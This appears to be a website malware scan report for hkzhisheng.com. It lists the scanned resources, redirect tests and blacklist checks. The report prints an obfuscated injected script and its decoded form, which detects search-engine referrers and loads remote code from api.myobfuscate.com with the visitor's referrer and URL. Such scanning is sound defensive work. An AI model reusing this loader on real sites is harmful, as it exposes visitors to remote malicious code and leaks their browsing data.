Scanned pages/files
Request | Server response | Status |
http://hkzhisheng.com/ | 200 OK Content-Length: 15238 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var O0I='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKs9UMfhCZslGaDRmblBHch5SSP9kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ASSP9EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLs9UMfpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ACbPFzXgIXY2tzJFNTJ0BXayN2cvM0MlEEMlI0MlkjMlgjMlIFR3UCR3USOyUyNyUiL3ITJ4ITJlRXaydnL05WZtV3YvRmQ3USZzxWZEdTJBBTJCNT Decoded script: var _escape='%3Cscript%3E%0Afunction%20R%28%29%7Bvar%20Ref%3Ddocument.referrer%3Bif%28Ref.indexOf%28%27.google.%27%29%21%3D-1%7C%7CRef.indexOf%28%27vk.%27%29%21%3D-1%7C%7CRef.indexOf%28%27google.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.yandex.%27%29%21%3D-1%7C%7CRef.indexOf%28%27yandex.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.bing.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.yahoo.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.aol.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.ask.%27%29%21%3D-1%7C%7CRef.indexOf%28%27.al _1Ol.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OOI = document.getElementsByTagName('head')[0]; OOI.appendChild(_1Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.hkzhisheng.com/js/common.js | 200 OK Content-Length: 2564 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/ajax.js | 200 OK Content-Length: 11824 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/prototype.js | 200 OK Content-Length: 73780 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/search.js | 200 OK Content-Length: 5840 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/ddlevelsmenu.js | 200 OK Content-Length: 16968 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/js/jquery.min.js | 200 OK Content-Length: 57272 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/skin/nitc3/en/js/jqselect.js | 200 OK Content-Length: 5226 Content-Type: application/javascript | clean |
http://www.hkzhisheng.com/vcall.php?language=1&flag=banner | 200 OK Content-Length: 974 Content-Type: text/html | clean |
http://www.hkzhisheng.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.hkzhisheng.com/js/statistics.js | 200 OK Content-Length: 3550 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hkzhisheng.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Nov 2014 06:10:04 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 15238
Content-Type: text/html
Last-Modified: Thu, 20 Nov 2014 08:21:39 GMT
...15238 bytes of data.
GET / HTTP/1.1
Host: hkzhisheng.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Nov 2014 06:10:04 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 15238
Content-Type: text/html
Last-Modified: Thu, 20 Nov 2014 08:21:39 GMT
...15238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hkzhisheng.com
Referer: http://www.google.com/search?q=hkzhisheng.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hkzhisheng.com
Referer: http://www.google.com/search?q=hkzhisheng.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hkzhisheng.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hkzhisheng.com/
Result: hkzhisheng.com is not infected or malware details are not published yet.
Result: hkzhisheng.com is not infected or malware details are not published yet.